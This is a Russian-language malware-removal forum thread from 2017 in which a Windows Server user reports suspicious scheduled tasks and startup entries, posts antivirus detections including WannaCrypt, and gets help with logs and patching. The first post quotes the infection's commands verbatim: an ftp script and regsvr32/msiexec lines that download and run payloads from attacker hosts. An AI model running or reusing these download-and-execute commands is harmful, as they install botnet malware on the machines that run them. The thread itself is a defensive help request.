-
Junior Member
- Вес репутации
- 30
Подозрение на вредонос
Здравствуйте.
Система Windows 2008 R2, свежеустановленная работает около недели, устанавливал с образа скачанного с рутрекера.
Заметил в планировщике заданий несколько подозрительных заданий, а именно:
1) Mysa1
действие: rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
2) Mysa2
действие: cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
3) ok
действие: rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Все эти задания настроены на выполнение при включении компьютера.
Я удалил эти задания из планировщика, но потом они были добавлены туда сного.
В директории c:\windows\debug\ файлов item.dat, s.dat и ok.dat я не обнаружил, но возможно они удаляются после отправки на ftp
Также увидел, что в автозагрузке сидит такое:
regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll
msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q
В редакторе реестра удалил эти записи из автозагрузки.
Подскажите пожалуйста, это вредонос или у меня паранойя?
Также дополнительно запустил проверку Dr.Web Scanner SE for Windows v9.1.4.01271:
\WMI\root\subscription\ActiveScriptEventConsumer {266c72e7-62e8-11d1-ad89-00c04fd8fdff}\ScriptText - infected with Trojan.MulDrop7.29574
\WMI\root\subscription\ActiveScriptEventConsumer {266c72e7-62e8-11d1-ad89-00c04fd8fdff}\ScriptText - infected
Process \Device\HarddiskVolume2\Program Files (x86)\1cv82\8.2.19.130\bin\1cv8.exe:3300 - infected with Trojan.Eps.38782
Microsoft Security Essentials нашел
Ransom:Win32/WannaCrypt
Объекты:
file:C:\Windows\qeriuwjhrf
file:C:\Windows\tasksche.exe
С Уважением, Дмитрий.
Последний раз редактировалось bizisoft; 24.06.2017 в 14:07.
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Уважаемый(ая) bizisoft, спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
-
-
Junior Member
- Вес репутации
- 30
Вечером запущу AutoLogger и HijackThis и предоставлю логи.
Прикрепляю логи от AutoLogger и HijackThis.
Последний раз редактировалось bizisoft; 24.06.2017 в 22:28.
-
Все обновления для системы, включая патч против WannaCry, установите
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 Reconnect
-
-
Junior Member
- Вес репутации
- 30
Сообщение от
thyrex
Все обновления для системы, включая патч против WannaCry, установите
Установил обновления системы и дополнительно патч от windows 7 x64.
Большое спасибо за помощь.
-
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
- Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.
3. Нажмите кнопку Scan.
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Отчеты, полученные в пп. 4 и 5, заархивируйте (в один архив) и прикрепите к сообщению.
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 Reconnect
-
-
Junior Member
- Вес репутации
- 30
-
Плохого в логах не увидел
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 Reconnect
-
-
Junior Member
- Вес репутации
- 30